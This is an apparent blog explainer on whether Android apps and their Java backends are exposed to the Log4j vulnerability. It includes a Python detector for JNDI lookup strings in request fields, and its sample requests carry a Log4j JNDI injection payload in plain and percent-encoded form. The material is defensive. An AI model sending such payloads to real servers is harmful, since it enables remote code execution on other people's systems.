
Are Android apps affected by the Log4j vulnerability?

Android apps also use Java, but are they affected by this new vulnerability? That depends on which Android apps you are using and which Android version you are running. The straight answer is that Android apps might not be affected by this vulnerability, because Android uses its own logging library and doesn't use JNDI calls (see below). In addition, each app is isolated from other apps.

But if the backend servers used by these Android apps are written in Java, then there is a very real chance that an attacker can send a malicious payload to the server via any mobile app and run their own commands on the server.
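An added example (not from the original post): a backend-side check that flags Log4j lookup syntax in fields a mobile client sends, such as headers and form values. The field names and sample requests are constructed for illustration; this is a detection aid for request data and logs, and patching Log4j on the server remains the fix.

```python
import re
from urllib.parse import unquote

# Log4j lookups are written "${prefix:...}"; the vulnerable case uses the "jndi" prefix.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{")

def classify(value: str) -> str:
    """Return 'jndi', 'lookup' or 'clean' for one client-supplied value."""
    decoded = value
    for _ in range(3):  # undo up to three layers of percent-encoding
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    if JNDI_LOOKUP.search(decoded):
        return "jndi"
    if ANY_LOOKUP.search(decoded):
        return "lookup"  # lookup syntax of any kind is not something an app should send
    return "clean"

def scan_request(fields: dict) -> list:
    """Return (field name, verdict) for every field that is not clean."""
    findings = []
    for name, value in fields.items():
        verdict = classify(str(value))
        if verdict != "clean":
            findings.append((name, verdict))
    return findings

# Constructed sample requests, as a Java backend might receive them from a mobile app.
SAMPLES = [
    {"User-Agent": "ExampleApp/2.1 (Android 12)", "username": "alice"},
    {"User-Agent": "${jndi:ldap://example.invalid/a}", "username": "bob"},
    {"User-Agent": "ExampleApp/2.1",
     "username": "%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D"},
    {"User-Agent": "ExampleApp/2.1", "X-Device-Name": "${date:yyyy}"},
]

if __name__ == "__main__":
    for number, request in enumerate(SAMPLES, start=1):
        print(number, scan_request(request) or "clean")
```

Running the same check before values reach the logger and again over stored request logs helps identify which mobile-facing endpoints have received such strings.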


JNDI call:
As you all know, the Log4j vulnerability was caused by a bug in the popular Log4j library that allowed a JNDI call in a malicious payload to directly call an external domain name without being filtered. Since the library is used in a lot of Java applications that run on servers, almost all of them need to be patched. But